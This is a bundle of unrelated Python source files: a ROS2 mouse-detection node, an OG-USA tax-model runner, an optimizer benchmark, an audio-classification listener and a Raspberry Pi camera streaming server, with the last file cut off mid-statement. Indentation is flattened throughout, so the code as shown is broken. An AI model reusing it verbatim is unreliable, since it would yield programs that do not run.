# Double buffer to hold the input images for inference.
self.input_buffer = utils.DoubleBuffer(clear_data_on_get=True)
# Get DEVICE parameter (CPU/MYRIAD) from launch file.
self.declare_parameter("DEVICE")
self.device = self.get_parameter("DEVICE").get_parameter_value().string_value
if not self.device:
self.device = constants.DEVICE
# Create subscription to sensor messages from camera.
self.image_subscriber = self.create_subscription(EvoSensorMsg,
constants.SENSOR_FUSION_TOPIC,
self.on_image_received_cb,
qos_profile)
# Creating publisher for confidence score of mouse detection.
self.mouse_publisher = self.create_publisher(MouseDetectionMsg,
constants.MOUSE_PUBLISHER_TOPIC,
qos_profile)
self.bridge = CvBridge()
# Launching a separate thread to run inference.
self.stop_thread = False
self.thread_initialized = False
self.thread = threading.Thread(target=self.run_inference)
self.thread.start()
self.thread_initialized = True
self.get_logger().info(f"Waiting for input images on {constants.SENSOR_FUSION_TOPIC}")
def wait_for_thread(self):
"""Function which joins the created background thread.
"""
if self.thread_initialized:
self.thread.join()
self.get_logger().info("Thread joined")
def thread_shutdown(self):
"""Function which sets the flag to shutdown background thread.
"""
self.stop_thread = True
def on_image_received_cb(self, sensor_data):
"""Call back for adding to the input double buffer whenever
new sensor image is received from sensor_fusion_node.
Args:
sensor_data (EvoSensorMsg): Message containing sensor images and lidar data.
"""
self.input_buffer.put(sensor_data)
def preprocess(self, sensor_data):
"""Method that preprocesses the input data to be provided for inference to network.
Args:
sensor_data (EvoSensorMsg): Contains sensor images and lidar data.
Returns:
image: Preprocessed image expected by the network.
"""
image = self.bridge.imgmsg_to_cv2(sensor_data.images[0])
ih, iw = image.shape[:-1]
# Resize to required input size
if (ih, iw) != (int(self.h), int(self.w)):
image = cv2.resize(image, (int(self.w), int(self.h)))
# Change data layout from HWC to CHW.
image = image.transpose((2, 0, 1))
return image
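# For example (sketch): a 480x640 BGR frame arrives from CvBridge with shape
# (480, 640, 3) (HWC); after the transpose above it becomes (3, 480, 640)
# (CHW), matching the zero-initialised buffers declared in __init__.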
def run_inference(self):
"""Method for running inference on received input image.
"""
try:
while not self.stop_thread:
# Get an input image from double buffer.
sensor_data = self.input_buffer.get()
start_time = time.time()
# Pre-process input.
self.current_sensor_data = self.preprocess(sensor_data)
# Initialize previous image
if np.array_equal(self.previous_sensor_data, np.zeros(shape=(3,480,640))):
self.previous_sensor_data = self.current_sensor_data
# Detect changes between the previous and current frames. The frames are in
# CHW layout, so compute the difference in NumPy and collapse the channel
# axis to the single-channel 8-bit image that cv2.findContours expects.
detection_delta = np.abs(self.current_sensor_data.astype(np.int16) -
self.previous_sensor_data.astype(np.int16))
detection_delta = detection_delta.max(axis=0).astype(np.uint8)
ret, thresh = cv2.threshold(detection_delta, 64, 255, 0)
contours, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
self.get_logger().info(f"Number of contours: {str(len(contours))}")
if len(contours) > 0 and len(contours) < 6:
self.mouse_flag = True
# Publish to object_detection_delta topic.
self.get_logger().info(f"Mouse detected: {self.mouse_flag}")
mouse_message = MouseDetectionMsg()
mouse_message.is_mouse = self.mouse_flag
self.mouse_publisher.publish(mouse_message)
# Save the current image as previous image and reset mouse_flag
self.previous_sensor_data = self.current_sensor_data
self.mouse_flag = False
self.get_logger().info(f"Total execution time = {time.time() - start_time}")
except Exception as ex:
self.get_logger().error(f"Failed inference step: {ex}")
# Destroy the ROS Node running in another thread as well.
self.destroy_node()
rclpy.shutdown()
def main(args=None):
rclpy.init(args=args)
qos = QoSProfile(reliability=QoSReliabilityPolicy.RMW_QOS_POLICY_RELIABILITY_BEST_EFFORT,
depth=1,
history=QoSHistoryPolicy.RMW_QOS_POLICY_HISTORY_KEEP_LAST)
try:
mouse_detection_node = MouseDetectionNode(qos)
executor = MultiThreadedExecutor()
def signal_handler(signum, frame):
"""Callback function to handle registered signal handler
to join and stop executing running thread created.
Args:
signum: The signal number
frame: the current stack frame (None or a frame object)
"""
mouse_detection_node.get_logger().info("Signal Handler initiated")
mouse_detection_node.thread_shutdown()
mouse_detection_node.wait_for_thread()
# Register SIGINT handler
signal.signal(signal.SIGINT, signal_handler)
rclpy.spin(mouse_detection_node, executor)
except Exception as ex:
mouse_detection_node.get_logger().error(f"Exception in Mouse Detection Node: {ex}")
mouse_detection_node.destroy_node()
rclpy.shutdown()
# Destroy the node explicitly
# (optional - otherwise it will be done automatically
# when the garbage collector destroys the node object)
mouse_detection_node.destroy_node()
rclpy.shutdown()
if __name__ == '__main__':
main()
|
run_ogusa.py
|
import os
import sys
import uuid
from multiprocessing import Process
import time
OGUSA_PATH = os.environ.get("OGUSA_PATH", "../../ospc-dynamic/dynamic/Python")
sys.path.append(OGUSA_PATH)
import ogusa
from ogusa.scripts import postprocess
from ogusa.scripts.execute import runner
def run_micro_macro(reform, user_params, guid):
start_time = time.time()
REFORM_DIR = "./OUTPUT_REFORM_" + guid
BASELINE_DIR = "./OUTPUT_BASELINE_" + guid
# Add start year from reform to user parameters
if isinstance(reform, tuple):
start_year = sorted(reform[0].keys())[0]
else:
start_year = sorted(reform.keys())[0]
user_params['start_year'] = start_year
with open("log_{}.log".format(guid), 'w') as f:
f.write("guid: {}\n".format(guid))
f.write("reform: {}\n".format(reform))
f.write("user_params: {}\n".format(user_params))
'''
------------------------------------------------------------------------
Run baseline
------------------------------------------------------------------------
'''
output_base = BASELINE_DIR
kwargs={'output_base':output_base, 'baseline_dir':BASELINE_DIR,
'test':False, 'time_path':True, 'baseline':True,
'analytical_mtrs':False, 'age_specific':False,
'user_params':user_params,'guid':guid,
'run_micro':True, 'small_open': False, 'budget_balance':False, 'baseline_spending':False}
#p2 = Process(target=runner, kwargs=kwargs)
#p2.start()
runner(**kwargs)
'''
------------------------------------------------------------------------
Run reform
------------------------------------------------------------------------
'''
output_base = REFORM_DIR
kwargs={'output_base':output_base, 'baseline_dir':BASELINE_DIR,
'test':False, 'time_path':True, 'baseline':False,
'analytical_mtrs':False, 'age_specific':False,
'user_params':user_params,'guid':guid,
'run_micro':True, 'small_open': False, 'budget_balance':False, 'baseline_spending':False}
#p1 = Process(target=runner, kwargs=kwargs)
#p1.start()
runner(**kwargs)
#p1.join()
#p2.join()
time.sleep(0.5)
ans = postprocess.create_diff(baseline_dir=BASELINE_DIR, policy_dir=REFORM_DIR)
print "total time was ", (time.time() - start_time)
return ans
if __name__ == "__main__":
reform = {
2017: {
'_II_rt1': [.09],
'_II_rt2': [.135],
'_II_rt3': [.225],
'_II_rt4': [.252],
'_II_rt5': [.297],
'_II_rt6': [.315],
'_II_rt7': [0.3564],
}, }
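    # These _II_rt* parameters appear to follow the Tax-Calculator convention for the
    # seven statutory individual income tax bracket rates, applied from 2017 onward.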
run_micro_macro(reform=reform, user_params={'frisch': 0.44}, guid='abc')
|
test_ISLO.py
|
#!/usr/bin/env python
# ------------------------------------------------------------------------------------------------------%
# Created by "Thieu" at 16:11, 14/08/2021 %
# %
# Email: nguyenthieu2102@gmail.com %
# Homepage: https://www.researchgate.net/profile/Nguyen_Thieu2 %
# Github: https://github.com/thieu1995 %
# ------------------------------------------------------------------------------------------------------%
import multiprocessing
from pathlib import Path
from config import Config
from model import benchmark
from pandas import DataFrame
from time import time
from utils.IOUtil import save_results_to_csv
TRIALS = 20
PROBLEM_SIZE = 30
LB = [-100] * PROBLEM_SIZE
UB = [100] * PROBLEM_SIZE
VERBOSE = False
EPOCH = 1000
POP_SIZE = 50
LIST_FUNCTIONS = ["f1", "f2", "f3", "f4", "f5", "f6", "f7", "f8", "f9", "f10", "f11", "f12", "f13", "f14", "f15", "f16", "f17", "f18", "f19", "f20"]
LIST_MHAS = ["ImprovedSLO2"]
def run_algorithm(name):
path_error = f"{Config.BENCHMARK_ERROR}/{name}/"
Path(path_error).mkdir(parents=True, exist_ok=True)
## Run model
for id_paras, func_name in enumerate(LIST_FUNCTIONS):
error_full = {}
error_columns = []
for id_trial in range(TRIALS):
time_start = time()
md = getattr(benchmark, name)(getattr(benchmark, func_name), LB, UB, VERBOSE, EPOCH, POP_SIZE)
_, best_fit, list_loss = md.train()
temp = f"trial_{str(id_trial)}"
error_full[temp] = list_loss
error_columns.append(temp)
time_end = time() - time_start
item = {'function': func_name, 'time': time_end, 'trial': id_trial, 'fit': best_fit}
save_results_to_csv(item, f"{PROBLEM_SIZE}D_{name}_best_fit", Config.BENCHMARK_BEST_FIT)
df = DataFrame(error_full, columns=error_columns)
df.to_csv(f"{path_error}/{PROBLEM_SIZE}D_{name}_{func_name}_error.csv", header=True, index=False)
if __name__ == '__main__':
starttime = time()
processes = []
for algorithm in LIST_MHAS:
p = multiprocessing.Process(target=run_algorithm, args=(algorithm,))
processes.append(p)
p.start()
for process in processes:
process.join()
print('That took: {} seconds'.format(time() - starttime))
|
listen.py
|
import numpy as np
from config.config import *
from lib.machinelearning import feature_engineering, feature_engineering_raw, get_label_for_directory, get_highest_intensity_of_wav_file, get_recording_power
import pyaudio
import wave
import time
import scipy
import scipy.io.wavfile
import hashlib
import os
import operator
import audioop
import math
import csv
from queue import *
import threading
import traceback
import sys
import lib.ipc_manager as ipc_manager
import joblib
from lib.audio_model import AudioModel
from lib.stream_controls import manage_loop_state
from lib.key_poller import KeyPoller
STATE_POLLING_THRESHOLD = 0.2
def classify_audioframes( audioQueue, audio_frames, classifier, high_speed ):
if( not audioQueue.empty() ):
audio_frames.append( audioQueue.get() )
# In case we are dealing with frames not being met and a buffer being built up,
# Start skipping every other audio frame to maintain being up to date,
# Trading being up to date over being 100% correct in sequence
if( audioQueue.qsize() > 1 ):
print( "SKIP FRAME", audioQueue.qsize() )
audioQueue.get()
if( len( audio_frames ) >= 2 ):
audio_frames = audio_frames[-2:]
highestintensity = np.amax( audioop.maxpp( audio_frames[1], 4 ) / 32767 )
wavData = b''.join(audio_frames)
# SKIP FEATURE ENGINEERING COMPLETELY WHEN DEALING WITH SILENCE
if( high_speed == True and highestintensity < SILENCE_INTENSITY_THRESHOLD ):
probabilityDict, predicted, frequency = create_empty_probability_dict( classifier, {}, 0, highestintensity, 0 )
else:
fftData = np.frombuffer( wavData, dtype=np.int16 )
power = get_recording_power( fftData, classifier.get_setting('RECORD_SECONDS', RECORD_SECONDS) )
probabilityDict, predicted, frequency = predict_raw_data( wavData, classifier, highestintensity, power )
return probabilityDict, predicted, audio_frames, highestintensity, frequency, wavData
return False, False, audio_frames, False, False, False
def action_consumer( stream, classifier, dataDicts, persist_replay, replay_file, mode_switcher=False ):
actions = []
global listening_state
starttime = time.time()
try:
if( persist_replay ):
with open(replay_file, 'a', newline='') as csvfile:
headers = ['time', 'winner', 'intensity', 'frequency', 'power', 'actions', 'buffer']
headers.extend( classifier.classes_ )
if ('silence' not in classifier.classes_):
headers.extend(['silence'])
writer = csv.DictWriter(csvfile, fieldnames=headers, delimiter=',')
writer.writeheader()
while( listening_state['currently_recording'] == True ):
if( not listening_state['classifierQueue'].empty() ):
current_time = time.time()
seconds_playing = time.time() - starttime
listening_state['last_audio_update'] = current_time
probabilityDict = listening_state['classifierQueue'].get()
dataDicts.append( probabilityDict )
if( len(dataDicts) > PREDICTION_LENGTH ):
dataDicts.pop(0)
if( mode_switcher ):
actions = mode_switcher.getMode().handle_input( dataDicts )
if( isinstance( actions, list ) == False ):
actions = []
replay_row = { 'time': int(seconds_playing * 1000) / 1000, 'actions': ':'.join(actions), 'buffer': listening_state['classifierQueue'].qsize()}
for label, labelDict in probabilityDict.items():
replay_row[ label ] = labelDict['percent']
if( labelDict['winner'] ):
replay_row['winner'] = label
replay_row['intensity'] = int(labelDict['intensity'])
replay_row['power'] = int(labelDict['power'])
replay_row['frequency'] = labelDict['frequency']
writer.writerow( replay_row )
csvfile.flush()
else:
time.sleep( RECORD_SECONDS / 3 )
else:
while( listening_state['currently_recording'] == True ):
if( not listening_state['classifierQueue'].empty() ):
                    dataDicts.append( listening_state['classifierQueue'].get() )
if( len(dataDicts) > PREDICTION_LENGTH ):
dataDicts.pop(0)
if( mode_switcher ):
actions = mode_switcher.getMode().handle_input( dataDicts )
if( isinstance( actions, list ) == False ):
actions = []
else:
time.sleep( RECORD_SECONDS / 3 )
except Exception as e:
print( "----------- ERROR DURING CONSUMING ACTIONS -------------- " )
exc_type, exc_value, exc_tb = sys.exc_info()
traceback.print_exception(exc_type, exc_value, exc_tb)
listening_state['stream'].stop_stream()
listening_state['currently_recording'] = False
def classification_consumer( audio, stream, classifier, persist_files, high_speed ):
audio_frames = []
dataDicts = []
for i in range( 0, PREDICTION_LENGTH ):
dataDict = {}
for directoryname in classifier.classes_:
dataDict[ directoryname ] = {'percent': 0, 'intensity': 0, 'frequency': 0, 'winner': False}
dataDicts.append( dataDict )
starttime = time.time()
global listening_state
try:
while( listening_state['currently_recording'] == True ):
probabilityDict, predicted, audio_frames, highestintensity, frequency, wavData = classify_audioframes( listening_state['audioQueue'], audio_frames, classifier, high_speed )
# Skip if a prediction could not be made
if( probabilityDict == False ):
time.sleep( classifier.get_setting('RECORD_SECONDS', RECORD_SECONDS) / 3 )
continue
seconds_playing = time.time() - starttime
winner = classifier.classes_[ predicted ]
prediction_time = time.time() - starttime - seconds_playing
#long_comment = "Time: %0.2f - Prediction in: %0.2f - Winner: %s - Percentage: %0d - Frequency %0d " % (seconds_playing, prediction_time, winner, probabilityDict[winner]['percent'], probabilityDict[winner]['frequency'])
short_comment = "T %0.3f - [%0d%s %s] F:%0d P:%0d" % (seconds_playing, probabilityDict[winner]['percent'], '%', winner, frequency, probabilityDict[winner]['power'])
if( winner != "silence" ):
print( short_comment )
listening_state['classifierQueue'].put( probabilityDict )
if( persist_files ):
audioFile = wave.open(REPLAYS_AUDIO_FOLDER + "/%0.3f.wav" % (seconds_playing), 'wb')
audioFile.setnchannels(classifier.get_setting('CHANNELS', CHANNELS))
audioFile.setsampwidth(audio.get_sample_size(FORMAT))
audioFile.setframerate(classifier.get_setting('RATE', RATE))
audioFile.writeframes(wavData)
audioFile.close()
except Exception as e:
print( "----------- ERROR DURING AUDIO CLASSIFICATION -------------- " )
exc_type, exc_value, exc_tb = sys.exc_info()
traceback.print_exception(exc_type, exc_value, exc_tb)
listening_state['stream'].stop_stream()
listening_state['currently_recording'] = False
def nonblocking_record( in_data, frame_count, time_info, status ):
global listening_state
listening_state['audioQueue'].put( in_data )
return in_data, pyaudio.paContinue
def start_nonblocking_listen_loop( classifier, mode_switcher = False, persist_replay = False, persist_files = False, amount_of_seconds=-1, high_speed=False ):
global listening_state
listening_state = {
'currently_recording': True,
'stream': None,
'audioQueue': Queue(maxsize=0),
'classifierQueue': Queue(maxsize=0),
'classifier_name': ipc_manager.getClassifier(),
'restart_listen_loop': False,
'last_audio_update': time.time()
}
# Get a minimum of these elements of data dictionaries
dataDicts = []
audio_frames = []
for i in range( 0, PREDICTION_LENGTH ):
dataDict = {}
for directoryname in classifier.classes_:
dataDict[ directoryname ] = {'percent': 0, 'intensity': 0, 'frequency': 0, 'winner': False}
dataDicts.append( dataDict )
starttime = time.time()
replay_file = REPLAYS_FOLDER + "/replay_" + str(int(starttime)) + ".csv"
infinite_duration = amount_of_seconds == -1
audio = pyaudio.PyAudio()
if ( validate_microphone_input(audio) == False ):
return None
if( infinite_duration ):
print( "Listening..." )
else:
print ( "Listening for " + str( amount_of_seconds ) + " seconds..." )
print ( "" )
listening_state['stream'] = audio.open(format=FORMAT, channels=classifier.get_setting('CHANNELS', CHANNELS),
rate=classifier.get_setting('RATE', RATE), input=True,
input_device_index=INPUT_DEVICE_INDEX,
frames_per_buffer=round( classifier.get_setting('RATE', RATE) * classifier.get_setting('RECORD_SECONDS', RECORD_SECONDS) / classifier.get_setting('SLIDING_WINDOW_AMOUNT', SLIDING_WINDOW_AMOUNT) ),
stream_callback=nonblocking_record)
classificationConsumer = threading.Thread(name='classification_consumer', target=classification_consumer, args=(audio, listening_state['stream'], classifier, persist_files, high_speed) )
classificationConsumer.setDaemon( True )
classificationConsumer.start()
actionConsumer = threading.Thread(name='action_consumer', target=action_consumer, args=(listening_state['stream'], classifier, dataDicts, persist_replay, replay_file, mode_switcher) )
actionConsumer.setDaemon( True )
actionConsumer.start()
listening_state['last_audio_update'] = time.time()
listening_state['stream'].start_stream()
ipc_manager.setParrotState("running")
while listening_state['currently_recording'] == True and listening_state['restart_listen_loop'] == False:
currenttime = time.time()
with KeyPoller() as key_poller:
if( not infinite_duration and currenttime - starttime > amount_of_seconds or manage_loop_state( "running", listening_state, mode_switcher, currenttime, STATE_POLLING_THRESHOLD, key_poller ) == False ):
listening_state['currently_recording'] = False
time.sleep(STATE_POLLING_THRESHOLD)
# Stop all the streams and different threads
listening_state['stream'].stop_stream()
listening_state['stream'].close()
audio.terminate()
listening_state['audioQueue'].queue.clear()
listening_state['classifierQueue'].queue.clear()
classificationConsumer.join()
actionConsumer.join()
# Restarting the listening loop is required when we are dealing with a different classifier
# As different classifiers might have different audio requirements
if (listening_state['restart_listen_loop'] == True):
classifier = load_running_classifier(ipc_manager.getClassifier())
listening_state['restart_listen_loop'] = False
listening_state['currently_recording'] = True
return start_nonblocking_listen_loop(classifier, mode_switcher, persist_replay, persist_files, amount_of_seconds, high_speed)
else:
return replay_file
def predict_wav_files( classifier, wav_files ):
dataDicts = []
audio_frames = []
print ( "Analyzing " + str( len( wav_files) ) + " audio files..." )
print ( "" )
for i in range( 0, PREDICTION_LENGTH ):
dataDict = {}
for directoryname in classifier.classes_:
dataDict[ directoryname ] = {'percent': 0, 'intensity': 0}
dataDicts.append( dataDict )
probabilities = []
for index, wav_file in enumerate( wav_files ):
highestintensity = get_highest_intensity_of_wav_file( wav_file, classifier.get_setting('RECORD_SECONDS', RECORD_SECONDS) )
probabilityDict, predicted, frequency = predict_wav_file( wav_file, classifier, highestintensity )
winner = classifier.classes_[predicted]
#print( "Analyzing file " + str( index + 1 ) + " - Winner: %s - Percentage: %0d - Frequency: %0d " % (winner, probabilityDict[winner]['percent'], probabilityDict[winner]['frequency']) , end="\r")
probabilities.append( probabilityDict )
print( " ", end="\r" )
return probabilities
def predict_raw_data( wavData, classifier, intensity, power ):
# FEATURE ENGINEERING
first_channel_data = np.frombuffer( wavData, dtype=np.int16 )
if( classifier.get_setting('CHANNELS', CHANNELS) == 2 ):
first_channel_data = first_channel_data[::2]
data_row, frequency = feature_engineering_raw( first_channel_data, classifier.get_setting('RATE', RATE), intensity, classifier.get_setting('RECORD_SECONDS', RECORD_SECONDS),
classifier.get_setting('FEATURE_ENGINEERING_TYPE', FEATURE_ENGINEERING_TYPE) )
data = [ data_row ]
return create_probability_dict( classifier, data, frequency, intensity, power )
def predict_wav_file( wav_file, classifier, intensity ):
# FEATURE ENGINEERING
data_row, frequency = feature_engineering( wav_file, classifier.get_setting('RECORD_SECONDS', RECORD_SECONDS), classifier.get_setting('FEATURE_ENGINEERING_TYPE', FEATURE_ENGINEERING_TYPE) )
data = [ data_row ]
if( intensity < SILENCE_INTENSITY_THRESHOLD ):
return create_empty_probability_dict( classifier, data, frequency, intensity, 0 )
else:
return create_probability_dict( classifier, data, frequency, intensity, 0 )
def create_empty_probability_dict( classifier, data, frequency, intensity, power ):
probabilityDict = {}
index = 0
predicted = -1
for label in classifier.classes_:
winner = False
percent = 0
if( label == 'silence' ):
predicted = index
percent = 100
winner = True
probabilityDict[ label ] = { 'percent': percent, 'intensity': int(intensity), 'winner': winner, 'frequency': frequency, 'power': power }
index += 1
if ('silence' not in classifier.classes_):
probabilityDict['silence'] = { 'percent': 100, 'intensity': int(intensity), 'winner': True, 'frequency': frequency, 'power': power }
return probabilityDict, predicted, frequency
def create_probability_dict( classifier, data, frequency, intensity, power ):
# Predict the outcome of the audio file
probabilities = classifier.predict_proba( data ) * 100
probabilities = probabilities.astype(int)
# Get the predicted winner
predicted = np.argmax( probabilities[0] )
if( isinstance(predicted, list) ):
predicted = predicted[0]
probabilityDict = {}
for index, percent in enumerate( probabilities[0] ):
label = classifier.classes_[ index ]
probabilityDict[ label ] = { 'percent': percent, 'intensity': int(intensity), 'winner': index == predicted, 'frequency': frequency, 'power': power }
if ('silence' not in classifier.classes_):
probabilityDict['silence'] = { 'percent': 100, 'intensity': int(intensity), 'winner': False, 'frequency': frequency, 'power': power }
return probabilityDict, predicted, frequency
# Load in a classifier that also sets the classifier state during runtime
def load_running_classifier( classifier_name ):
if( classifier_name != "dummy" ):
print( "Loading classifier " + CLASSIFIER_FOLDER + "/" + classifier_name + ".pkl" )
classifier = joblib.load( CLASSIFIER_FOLDER + "/" + classifier_name + ".pkl" )
if( not isinstance( classifier, AudioModel ) ):
settings = {
'version': 0,
'RATE': RATE,
'CHANNELS': CHANNELS,
'RECORD_SECONDS': RECORD_SECONDS,
'SLIDING_WINDOW_AMOUNT': SLIDING_WINDOW_AMOUNT,
'FEATURE_ENGINEERING_TYPE': FEATURE_ENGINEERING_TYPE
}
classifier = AudioModel( settings, classifier )
ipc_manager.setClassifier(classifier_name)
else:
print( "Loading dummy classifier for testing purposes" )
from lib.dummy_classifier import DummyClassifier
classifier = DummyClassifier()
ipc_manager.setClassifier("dummy")
return classifier
# Validate and print the currently used microphone
def validate_microphone_input( audio ):
try:
micDict = audio.get_device_info_by_index( INPUT_DEVICE_INDEX )
if (micDict and micDict['maxInputChannels'] > 0):
print( "Using input from " + micDict['name'] )
return True
else:
raise IOError( "Invalid number of channels" )
except IOError as e:
print( "------ ERROR - NO VALID MICROPHONE FOUND DURING START UP ------ " )
print( "Make sure your microphone is connected before starting up Parrot" )
print( "or change the INPUT_DEVICE_INDEX in the config/config.py file.")
print( "And rerun Parrot to have the proper connection" )
print( "---------------------------------------------------------------")
return False
|
server.py
|
#!/usr/bin/env python
import sys
import io
import os
import shutil
import cgi
from subprocess import Popen, PIPE
from string import Template
from struct import Struct
from threading import Thread
from time import sleep, time
from http.server import HTTPServer, BaseHTTPRequestHandler
from wsgiref.simple_server import make_server
import picamera
from ws4py.websocket import WebSocket
from ws4py.server.wsgirefserver import (
WSGIServer,
WebSocketWSGIHandler,
WebSocketWSGIRequestHandler,
)
from ws4py.server.wsgiutils import WebSocketWSGIApplication
###########################################
# CONFIGURATION
WIDTH = 640
HEIGHT = 480
FRAMERATE = 20
HTTP_PORT = 8082
WS_PORT = 8084
COLOR = u'#444'
BGCOLOR = u'#333'
JSMPEG_MAGIC = b'jsmp'
JSMPEG_HEADER = Struct('>4sHH')
VFLIP = True
HFLIP = True
###########################################
class StreamingHttpHandler(BaseHTTPRequestHandler):
def do_HEAD(self):
self.do_GET()
def do_GET(self):
if self.path == '/':
self.send_response(301)
self.send_header('Location', '/dashboard')
self.end_headers()
return
elif self.path == '/jsmpg.js':
content_type = 'application/javascript'
content = self.server.jsmpg_content
elif self.path == '/bootstrap.css':
content_type = 'text/css'
content = self.server.bootstrap_content
elif self.path == '/style.css':
content_type = 'text/css'
content = self.server.style_content
elif self.path == '/jquery.js':
content_type = 'application/javascript'
content = self.server.jquery_content
elif self.path == '/bootstrap.js':
content_type = 'application/javascript'
content = self.server.bootstrap_js_content
elif self.path == '/popper.js':
content_type = 'application/javascript'
content = self.server.popper_content
elif self.path == '/script.js':
content_type = 'application/javascript'
content = self.server.script_content
elif self.path == '/live':
content_type = 'text/html; charset=utf-8'
tpl = Template(self.server.live_stream_template)
content = tpl.safe_substitute(dict(
WS_PORT=WS_PORT, WIDTH=WIDTH, HEIGHT=HEIGHT, COLOR=COLOR,
BGCOLOR=BGCOLOR))
elif self.path == '/configuration':
content_type = 'text/html; charset=utf-8'
tpl = Template(self.server.configuration_template)
content = tpl.safe_substitute(dict(
WS_PORT=WS_PORT, WIDTH=WIDTH, HEIGHT=HEIGHT, COLOR=COLOR,
BGCOLOR=BGCOLOR))
elif self.path == '/dashboard':
content_type = 'text/html; charset=utf-8'
            tpl = Template(self.server.dashboard_template)
content = tpl.safe_substitute(dict(
WS_PORT=WS_PORT, WIDTH=WIDTH, HEIGHT=HEIGHT, COLOR=COLOR,
BGCOLOR=BGCOLOR))
else:
self.send_error(404, 'File not found')
return
content = content.encode('utf-8')
self.send_response(200)
self.send_header('Content-Type', content_type)
self.send_header('Content-Length', len(content))
self.send_header('Last-Modified', self.date_time_string(time()))
self.end_headers()
if self.command == 'GET':
self.wfile.write(content)
# posting of commands will happen here
# stuff like configuring the router and camera parameters
    # as well as the MQTT messages and starting/stopping the camera
def do_POST(self):
        ctype, pdict = cgi.parse_header(self.headers.get('content-type'))
if ctype == 'multipart/form-data':
postvars = cgi.parse_multipart(self.rfile, pdict)
elif ctype == 'application/x-www-form-urlencoded':
            length = int(self.headers.get('content-length'))
postvars = cgi.parse_qs(self.rfile.read(length), keep_blank_values=1)
else:
postvars = {}
# here we do the parsing of the header to make changes to the camera's state
if self.path == "/SetResolution":
pass
elif self.path == "/SetFramerate":
pass
elif self.path == "/SetMotionDetectionParams":
pass
elif self.path == "/SetCredentials":
pass
elif self.path == "/GetConfigurationInformation":
pass
pass
class StreamingHttpServer(HTTPServer):
def __init__(self):
super(StreamingHttpServer, self).__init__(
('', HTTP_PORT), StreamingHttpHandler)
with io.open('static/jsmpg.js', 'r') as f:
self.jsmpg_content = f.read()
with io.open('static/bootstrap.css', 'r') as f:
self.bootstrap_content = f.read()
with io.open('static/jquery.js', 'r') as f:
self.jquery_content = f.read()
with io.open('static/script.js', 'r') as f:
self.script_content = f.read()
with io.open('static/popper.js', 'r') as f:
self.popper_content = f.read()
with io.open('static/bootstrap.js', 'r') as f:
self.bootstrap_js_content = f.read()
with io.open('static/style.css', 'r') as f:
self.style_content = f.read()
with io.open('templates/livestream.html', 'r') as f:
self.live_stream_template = f.read()
with io.open('templates/dashboard.html', 'r') as f:
            self.dashboard_template = f.read()
with io.open('templates/configuration.html', 'r') as f:
self.configuration_template = f.read()
class StreamingWebSocket(WebSocket):
def opened(self):
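        # On connect, send the jsmpeg initialization header: the 4-byte magic 'jsmp'
        # followed by the big-endian 16-bit frame width and height (JSMPEG_HEADER above).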
self.send(JSMPEG_HEADER.pack(JSMPEG_MAGIC, WIDTH, HEIGHT), binary=True)
class BroadcastOutput(object):
def __init__(self, camera):
print('Spawning background conversion process')
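        # ffmpeg reads the raw yuv420p frames written via write() below on stdin and
        # emits an MPEG-1 stream on stdout, which BroadcastThread relays to jsmpg.js clients.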
self.converter = Popen([
'ffmpeg',
'-f', 'rawvideo',
'-pix_fmt', 'yuv420p',
'-s', '%dx%d' % camera.resolution,
'-r', str(float(camera.framerate)),
'-i', '-',
'-f', 'mpeg1video',
'-b', '800k',
'-r', str(float(camera.framerate)),
'-'],
stdin=PIPE, stdout=PIPE, stderr=io.open(os.devnull, 'wb'),
shell=False, close_fds=True)
def write(self, b):
self.converter.stdin.write(b)
def flush(self):
print('Waiting for background conversion process to exit')
self.converter.stdin.close()
self.converter.wait()
class BroadcastThread(Thread):
def __init__(self, converter, websocket_server):
super(BroadcastThread, self).__init__()
self.converter = converter
self.websocket_server = websocket_server
def run(self):
try:
while True:
buf = self.converter.stdout.read1(32768)
if buf:
self.websocket_server.manager.broadcast(buf, binary=True)
elif self.converter.poll() is not None:
break
finally:
self.converter.stdout.close()
def main():
print('Initializing camera')
with picamera.PiCamera() as camera:
camera.resolution = (WIDTH, HEIGHT)
camera.framerate = FRAMERATE
camera.vflip = VFLIP # flips image rightside up, as needed
camera.hflip = HFLIP # flips image left-right, as needed
sleep(1) # camera warm-up time
print('Initializing websockets server on port %d' % WS_PORT)
WebSocketWSGIHandler.http_version = '1.1'
websocket_server = make_server(
'', WS_PORT,
server_class=WSGIServer,
handler_class=WebSocketWSGIRequestHandler,
app=WebSocketWSGIApplication(handler_cls=StreamingWebSocket))
websocket_server.initialize_websockets_manager()
websocket_thread = Thread(target=websocket_server.serve_forever)
print('Initializing HTTP server on port %d' % HTTP_PORT)
http_server = StreamingHttpServer()
http_thread = Thread(target=http_server.serve_forever)
print('Initializing broadcast thread')
output = BroadcastOutput(camera)
broadcast_thread = BroadcastThread(output.converter, websocket_server)
print('Starting recording')
camera.start_recording(output, 'yuv')
try:
print('Starting websockets thread')
websocket_thread.start()
print('Starting HTTP server thread')
http_thread.start()
print('Starting broadcast thread')
broadcast_thread.start()
while True:
camera.wait_recording(1)
except KeyboardInterrupt:
pass
finally:
print('Stopping recording')
camera.stop_recording()
print('Waiting for broadcast thread to finish')
broadcast_thread.join()
print('Shutting down HTTP server')
http_server.shutdown()
print('Shutting down websockets server')
websocket_server.shutdown()
print('Waiting for HTTP server thread to finish')
http_thread.join()
print('Waiting for websockets thread to finish')
websocket_thread.join()
if __name__ == '__main__':
main()
|
utils.py
|
# Copyright 2015, Yahoo Inc.
# Licensed under the terms of the Apache License, Version 2.0. See the LICENSE file associated with the project for terms.
import numpy as np
import multiprocessing
from itertools import chain
def iterate_splits(x, splits):
"""
A helper to iterate subvectors.
:param ndarray x:
a vector to iterate over
:param int splits:
the number of subvectors
:returns (np.array, int):
subvector, split index pairs
"""
split_size = len(x) / splits
for split in xrange(splits):
start = split * split_size
yield x[start:start + split_size], split
def concat_new_first(arrs):
"""
Helper to concatenate a list of ndarrays along a new first dimension.
"""
arrs = map(lambda x: x[np.newaxis, ...], arrs)
return np.concatenate(arrs, axis=0)
def predict_cluster(x, centroids):
"""
Given a vector of dimension D and a matrix of centroids of dimension VxD,
return the id of the closest cluster
:params np.array x:
the data to assign
:params np.array centroids:
a matrix of cluster centroids
:returns int:
cluster assignment
"""
return ((x - centroids) ** 2).sum(axis=1).argmin(axis=0)
def load_xvecs(filename, base_type='f', max_num=None):
"""
A helper to read in sift1m binary dataset. This parses the
binary format described at http://corpus-texmex.irisa.fr/.
:returns ndarray:
a N x D array, where N is the number of observations
and D is the number of features
"""
import os
import struct
format_code, format_size, py_type = {
'f': ('f', 4, float),
'i': ('I', 4, int),
'b': ('B', 1, float)
